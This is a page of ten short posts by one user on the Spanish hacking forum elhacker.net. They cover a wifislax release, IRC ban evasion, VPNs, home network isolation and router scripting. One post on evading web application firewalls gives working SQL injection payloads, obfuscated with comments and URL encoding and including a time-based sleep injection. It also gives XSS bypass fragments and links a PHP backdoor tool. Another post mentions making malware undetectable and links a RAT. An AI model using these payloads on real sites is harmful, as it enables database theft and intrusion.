elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 ... 486
101  Seguridad Informática / Hacking Wireless / Disponible wifislax64-2.4-final para descargar en: 21 Enero 2021, 20:57 pm
Se sigue utilizando como base slackware64-14.2 , con todos sus parches de seguridad al día.
Esta iso es un punto de control para la versión estable , se han actualizado todos los paquetes base , como firmwares , kernel … navegador etc.

Como kernel sale con linux-5.4.91 LTS
Como navegador , trae el recien estrenado chrome 88 , que ademas de muchos parches de seguridad , han eliminado finalmente el soporte de flash player.



Seguramente sera la ultima versión de wifislax con kde4 y slackware64-14.2

Changelog

Citar
20/01/2021
01 - Actualizado kernel 5.4.89 --> 5.4.91
02 - Actualizados firmwares de sistema
03 - Actualizado chrome-85.0.4183.121 --> 88.0.4324.96
04 - Actualizado bettercap-2.28 --> 2.29
05 - Actualizado airgeddon-10.31 --> 10.40

12/01/2021
01 - Actualizado kernel 5.4.88 --> 5.4.89
02 - Actualizado wpscan-3.8.12 --> 3.8.13
03 - Modificado hostapd-2.9 con mas opciones.

06/01/2021
01 - Actualizado kernel 5.4.87 --> 5.4.88
02 - Actualizados firmwares de sistema
03 - Mejorado wallpaper island por conca
     Se veían imperfecciones en la parte baja
     si usábamos un monitor grande.

Descarga
https://ns2.elhacker.net/isos/wifislax64-2.4-final.iso

Fuente:
https://foro.seguridadwireless.net/live-wifislax/wifislax64-2-4-final-para-descarga
102  Seguridad Informática / Análisis y Diseño de Malware / Re: programar un malware en: 21 Enero 2021, 20:36 pm
Lo que hay sobretodo son técnicas de ocultación, en este caso para hacerlo FUD (indetectable al antivirus), sea el lenguaje que sea.

Un ejemplo de RAT multiplataforma bastante curioso.

Arbitrium-RAT: troyano de acceso remoto multiplataforma (Windows-Android-Linux)
https://blog.elhacker.net/2021/01/arbitrium-rat-troyano-de-acceso-remoto-multiplataforma-windows-android..html
103  Comunicaciones / Chats; IRC y Messengers / Re: saltarse baneos en irc en: 21 Enero 2021, 20:32 pm
hoy en día con la cantidad de vpn's que hay disponibles es todavía más fácil saltarse un baneo. Seguro que hay bnc (bouncers)  y demás.

[D]aniel  te lo ha explicado muy bien, depende del formato del ban, si es por nick o ip

Citar
    0: *!user@host.domain
    1: *!*user@host.domain
    2: *!*@host.domain
    3: *!*user@*.domain
    4: *!*@*.domain
    5: nick!user@host.domain
    6: nick!*user@host.domain
    7: nick!*@host.domain
    8: nick!*user@*.domain
    9: nick!*@*.domain

¿Todavía se usa IRC? Pensaba que todos se mudaron a Discord  :laugh:
104  Foros Generales / Dudas Generales / Re: Google Forms en: 21 Enero 2021, 20:23 pm
Google Forms genera automáticamente si lo deseas un una hoja de cálculo tipo "excel" y también un reporte en HTML con gráficos en forma de quesitos. Puedes guardar esa página en HTML directamente desde el navegador, exportar en PDF.

También puedes exportar loa hoja de cálculo separada por ; , etc
105  Seguridad Informática / Nivel Web / Re: Evasión de WAF. en: 20 Enero 2021, 00:43 am
En github y medium he visto un montón de "trucos" técnicas y ejemplos para hacer un bypass de WAF. También hay varios bypass para el WAF de CloudFLare por ejemplo. Sería muy interesante primero averiguar el WAF que están utilizando. En las cabeceras de las peticiones web suelen añadir el WAF xD

Mejor manual que usar un "tamper". Puedes usar mayúsculas-minúsculas (dudo que funciona jaja) pero codificación URL + comentarios si

WAF Bypassing Strings usando comentarios, Url Encode (encoding)
Illegal mix of Collations ByPass Method

Código:
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'


Aquí tienes ejemplos:

Citar
+union+select+1,2...+--+-
✖️
+/*!50000union*/+/*!50000select*/+1,2...+--+-
✖️

+/*!50000union%23%0Aselect*/+1,2...+--+-
✔️
+/*!50000uNiOn*/(/*!50000SeLeCt*/+11,22,33....)+--+-

Union select 1,2,3,4,...--
 /*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4... --


✔️

Código:
/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4,5--

%75%6e%69on = union
%73%65%6cect = select

%75%6e%69 = uni = url encode
%73%65%6c = sel = url encode

Citar
1,group_concat(table_name) /*%%!asd%%%%*/from /*%%!asd%%%%*/information_schema.tables where table_schema=database(/*%%!asd%%%%*/) --+

Ejemplos:
https://github.com/Y000o/Payloads_xss_sql_bypass/blob/master/Payloads_xss_sql_bypass.md#sql-injection
https://medium.com/bugbountywriteup/exploiting-error-based-sql-injections-bypassing-restrictions-ed099623cd94
https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/

Lo mismo para evadir (bypass) de XSS

    1st Injection: */</script><!--
    2nd Injection: */.domain)/*xxx
    3rd Injection:*/(document/*xx
    4th Injection: */prompt/*xxxxx
    5th Injection: "><script>/*xss

https://twitter.com/XssPayloads



O sé imaginativo: Por ejemplo usa Bantam, Una herramienta de generación y administración de puerta trasera de PHP con transmisión de carga útil cifrada de extremo a extremo diseñada para evitar los sistemas WAF, IDS, SIEM

https://github.com/gellin/bantam

106  Informática / Hardware / Re: Combos chinos de hardware a precios ridículos en: 20 Enero 2021, 00:05 am
Con ojo a lo que compramos a los chinos.....en una pagina archiconocida compre hace muy poco un HDD de 2,5 de 1 Tb y lo que me han enviado es uno de ......300 Gb.

Y ahora reclama...jaja

Saludos.

Justo me ha recordado a esto:



Comprobar la capacidad real de espacio en un pendrive
https://blog.elhacker.net/2021/01/comprobar-la-capacidad-real-de-un-pendrive-detectar-si-es-falso.html
107  Comunicaciones / Redes / Re: Implementación zona aislada en la red de casa. en: 20 Enero 2021, 00:03 am
Citar
¿sería recomendable que el portátil estuviera dentro de una red aislada en mi propia red interna? De ser así ¿Qué método sería el recomendado?
Por temas de seguridad y privacidad no me haría mucha ilusión que todo estuviera dentro de la misma red.

Si te conectas a la red del trabajo por una vpn suya, pues se supone que la red del trabajo es segura ¿no?

Si la red de tu trabajo no es segura, apaga y vámonos.

Dudo que en la red interna de tu trabajo haya gente haciendo pruebas de pentesting, aunque todo podría ser xD

Otro tema es que con algunas VPN's (la mayoría) también puedes navegar con la misma ip pública del trabajo y eso si no es recomendable xD

Configura el navegador de manera privada, activando TLS 1.3, ESNI, DoH y DoT, etc
https://blog.elhacker.net/2020/11/activar-medidas-privacidad-navegador-firefox-chrome-windows10-android-linux-esni-tls-dns-over-tls.html
108  Foros Generales / Dudas Generales / Re: ¿VPN Ecuador? en: 19 Enero 2021, 23:43 pm
lo ideal seria buscar VPN Ip Ecuador o proxy ecuador en Google, seguro que encuentras algo.

http://free-proxy.cz/es/proxylist/country/EC/all/ping/all

¿O algún nodo de Tor de Ecuador no te sirve?
109  Foros Generales / Dudas Generales / Re: Detectar Puertos USB al ser usados? en: 19 Enero 2021, 23:38 pm
Hay varias herramientas gratuitas para detectar funcionamiento e puertos USB. Por ejemplo "URC Access Modes"

Herramientas para ver el historial dispositivos USB utilizados, denegar acceso pendrives, etc.
https://blog.elhacker.net/2017/03/protege-tus-puertos-usb-de-pendrives-roba-datos-badUSB.html

Si quieres automatizar tareas puedes usar el "if this then that" la conocida aplicación IFTTT. Puedes hacer prácticamente todo lo que se te ocurra.
110  Foros Generales / Dudas Generales / Re: Cambiar configuración de mi router desde CMD/BATCH/SCRIPT? en: 19 Enero 2021, 23:32 pm
Puedes grabar una acción con algún programa tipo "automate it"

Pero si es un router sería mucho mejor (más rápido y eficiente) conectarse por ssh (con llaves) sin usar contraseña y aplicar directamente los comandos.

Puedes automatizar la tarea con un cron job directamente en el router (seguramente sea linux).

Todo depende del router que estés usando y las posibilidades dependiendo del firmware que tenga.

Nota: Activar y desactivar el filtrado MAC no sirve de nada, puesto que se puede clonar una dirección MAC sin muchos problemas.
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 ... 486
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines